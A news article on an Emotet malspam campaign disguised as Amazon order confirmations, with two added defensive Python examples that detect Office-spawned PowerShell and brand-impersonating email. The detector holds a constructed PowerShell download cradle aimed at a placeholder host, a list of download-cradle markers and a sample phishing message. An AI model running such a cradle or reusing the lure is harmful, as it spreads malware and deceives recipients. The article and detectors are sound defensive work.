Fake Amazon Order Confirmations Push Banking Trojans on Holiday Shoppers

Phishing and malspam campaigns are in high gear for the holidays and a new campaign pretending to be an Amazon order confirmation is particularly dangerous as people shop for holiday gifts.

In a new malspam campaign discovered by email security company EdgeWave, attackers are sending email disguised as very convincing Amazon order confirmations. These fake order confirmations are being sent with subject lines that include “Your order”, “Amazon order details”, and “Your order 162-2672000-0034071 has shipped”.

When you open one of these emails, you are shown an order confirmation stating that your item has shipped, but without any details about what was ordered or any tracking information. The email then tells the recipient to click the Order Details button to see more information.

Fake Amazon Order Confirmation

When a user clicks on this button, a Word document named order_details.doc is downloaded. When this file is opened, it states that you need to Enable Content in order to properly view it, as shown below.

Malicious Word Document

If a user clicks on the Enable Content button, macros are triggered that execute a PowerShell command, which downloads and executes the Emotet banking Trojan on the victim’s computer. In this case the name of the trojan was mergedboost.exe, but when EdgeWave tested the maldoc, they told BleepingComputer that Emotet was being downloaded as Keyandsymbol.exe at that time.

Fiddler traffic showing Emotet being downloaded

This Trojan then runs silently in the background, logging keystrokes, stealing account information, and performing other unwanted activities on the computer.
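The infection chain described above (Word document, Enable Content, macro, PowerShell download, executable) leaves a distinctive trace on the endpoint: an Office application spawning a script host, often with a hidden window and an encoded command line. The following is an added defender-side example, not code from the article, EdgeWave or BleepingComputer. It scans process-creation events shaped like Sysmon Event ID 1 data, decodes any `-EncodedCommand` argument (UTF-16LE base64) so that download cradles hidden inside it are visible, and rates the Office-to-PowerShell parent/child pair. The three events are constructed for this example and `example.invalid` is a placeholder host.

```python
"""Rate process-creation events for the Office -> PowerShell pattern.

Added example (not EdgeWave's or BleepingComputer's code). Field names
follow Sysmon Event ID 1 (ParentImage, Image, CommandLine); the events
below are constructed, not captured from the campaign in the article.
"""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Substrings that, in a command line or its decoded payload, indicate a
# download-and-run or hide-the-window intent. Matched case-insensitively.
DOWNLOAD_MARKERS = (
    "downloadfile", "downloadstring", "invoke-webrequest", "start-process",
    "-w hidden", "-windowstyle hidden", "-encodedcommand", "-enc ",
)

# Constructed cradle, encoded the same way PowerShell expects -EncodedCommand
# (base64 over UTF-16LE). example.invalid is a placeholder, not a real host.
CRADLE = "(New-Object Net.WebClient).DownloadFile('http://example.invalid/x.exe','x.exe')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed sample data
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -enc " + ENCODED},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe 12288"},
]


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or '' if absent/undecodable."""
    m = re.search(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def classify_event(ev: dict) -> dict:
    """Rate one event: 'high', 'medium' or 'none', with the markers that fired."""
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    haystack = (cmd + " " + decoded).lower()
    markers = [mk for mk in DOWNLOAD_MARKERS if mk in haystack]
    office_to_script = parent in OFFICE_PARENTS and image in SCRIPT_HOSTS
    if office_to_script and markers:
        severity = "high"       # Office spawned a script host with download/hide intent
    elif office_to_script:
        severity = "medium"     # Office spawned a script host; review the command line
    else:
        severity = "none"
    return {"parent": parent, "image": image, "severity": severity,
            "markers": markers, "decoded": decoded}


def scan_events(events: list) -> list:
    """Return the classified events that deserve an alert (severity != 'none')."""
    return [r for r in (classify_event(e) for e in events) if r["severity"] != "none"]


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert["severity"], alert["parent"], "->", alert["image"], alert["markers"])
        if alert["decoded"]:
            print("  decoded:", alert["decoded"])
```

The decode step matters more than the marker list: the same cradle with `-enc` would score only "medium" on the visible command line, and "high" only once the base64 is expanded. A production rule would also allow-list known administrative parents and scripts, but the parent/child pair plus a decoded command line is the check a responder wants first.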

EdgeWave told BleepingComputer that this campaign utilizes compromised servers located in Colombia, Indonesia, and the United States of America.

“Interestingly, these other servers are in Houston and Lansing. Playing Dora the Explorer for a moment, we’ve encountered a compromised email server in Colombia sending phishing email with a link to a server in Indonesia that downloads malware which then contacts compromised servers in the United States. The holidays are truly global!”

Because it is so easy for a recipient to fall for this scam, users should pay close attention to who is sending them email before opening any attached documents or interacting with the email. This is especially true during the holidays, when it is common to receive a lot of email from online vendors.

When you receive an email, examine who it came from, and if it looks even remotely suspicious, simply delete it; you can always log in to the site in question to check an order status. In this case, while the emails themselves were spot on and looked identical to an Amazon order confirmation, the email address they came from was clearly suspect. Something as simple as that should be the only reason you need to delete the email.
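The check the article recommends, looking at who the message really came from rather than at how it looks, can be automated at the mail gateway or in a triage script. The following is an added example, not code from the article or from EdgeWave: it parses a raw message, compares the sender's address domain with the brand named in the display name and subject, extracts the hosts behind every link, and flags a link that fetches an Office document. The message is constructed for this example (the `example.net`/`example.org` hosts are placeholders); the subject line reuses the order number quoted in the article.

```python
"""Flag brand-impersonating mail by checking sender domain and link hosts.

Added example, not the article's or EdgeWave's code. The raw message below
is constructed; only the subject line's order number comes from the article.
"""
import re
from email import message_from_string, policy
from email.utils import parseaddr
from urllib.parse import urlparse

SAMPLE_EMAIL = """\
From: "Amazon.com" <auto-confirm@mail-notice.example.net>
To: shopper@example.com
Subject: Your order 162-2672000-0034071 has shipped
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Hello, your item has shipped.</p>
<p><a href="http://order-status.example.org/order_details.doc">Order Details</a></p>
</body></html>
"""

# Extensions that should never be what an order-confirmation link resolves to.
OFFICE_EXTENSIONS = (".doc", ".docm", ".xls", ".xlsm", ".rtf")


def _belongs_to(host: str, brand_domains) -> bool:
    """True if host is one of the brand domains or a subdomain of one."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in brand_domains)


def link_urls(html: str) -> list:
    """Return every http(s) URL found in href attributes."""
    return re.findall(r'href=["\']?(https?://[^"\'\s>]+)', html, flags=re.IGNORECASE)


def assess(raw_message: str, brand_domains=("amazon.com",)) -> dict:
    """Parse a raw message and list the reasons it looks like brand impersonation."""
    msg = message_from_string(raw_message, policy=policy.default)
    display_name, address = parseaddr(str(msg["From"] or ""))
    sender_domain = address.rsplit("@", 1)[-1].lower() if "@" in address else ""
    subject = str(msg["Subject"] or "")

    body_part = msg.get_body(preferencelist=("html", "plain"))
    body = body_part.get_content() if body_part is not None else ""
    urls = link_urls(body)
    hosts = [(urlparse(u).hostname or "").lower() for u in urls]

    # Does the visible text claim the brand? Use the label before the TLD.
    brand_words = [d.split(".")[0] for d in brand_domains]
    claims_brand = any(w in (display_name + " " + subject).lower() for w in brand_words)

    findings = []
    if claims_brand and not _belongs_to(sender_domain, brand_domains):
        findings.append(f"display name/subject claims {brand_words[0]} but sender domain is {sender_domain or 'missing'}")
    for url, host in zip(urls, hosts):
        if not _belongs_to(host, brand_domains):
            findings.append(f"link host {host} is outside {', '.join(brand_domains)}")
        if urlparse(url).path.lower().endswith(OFFICE_EXTENSIONS):
            findings.append(f"link fetches an Office document: {urlparse(url).path.rsplit('/', 1)[-1]}")

    return {"display_name": display_name, "sender": address, "sender_domain": sender_domain,
            "link_hosts": hosts, "findings": findings,
            "verdict": "suspicious" if findings else "ok"}


if __name__ == "__main__":
    report = assess(SAMPLE_EMAIL)
    print(report["verdict"], "-", report["sender"])
    for f in report["findings"]:
        print("  -", f)
```

The sender-domain test is the one a person can do by eye, which is the article's point; the link-host and attachment-type tests catch the case where a compromised but legitimate-looking mail server is used (as EdgeWave describes), since the Order Details link still has to point somewhere the attacker controls.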

The Internet is a scary place at all times during the year, but even more so during the holidays. Be careful and be safe.